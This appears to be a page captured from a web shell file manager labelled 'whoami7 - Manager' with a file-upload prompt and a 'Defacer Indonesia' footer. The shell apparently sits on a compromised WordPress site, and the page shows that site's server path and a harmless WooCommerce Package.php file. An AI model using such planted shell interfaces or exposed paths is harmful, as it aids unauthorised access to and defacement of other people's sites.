whoami7 - Manager
:
/
home
/
dataiclx
/
vielorbe.com
/
wp-content
/
plugins
/
woocommerce
/
packages
/
email-editor
/
src
/
Upload File:
files >> //home/dataiclx/vielorbe.com/wp-content/plugins/woocommerce/packages/email-editor/src/Package.php
<?php namespace MailPoet\EmailEditor; defined( 'ABSPATH' ) || exit; /** * Main package class. */ class Package { /** * Version. * * @var string */ const VERSION = '0.1.0'; /** * Init the package. */ public static function init() { EmailEditorContainer::init(); } /** * Return the version of the package. * * @return string */ public static function get_version() { return self::VERSION; } /** * Return the path to the package. * * @return string */ public static function get_path() { return dirname( __DIR__ ); } }
Copyright ©2021 || Defacer Indonesia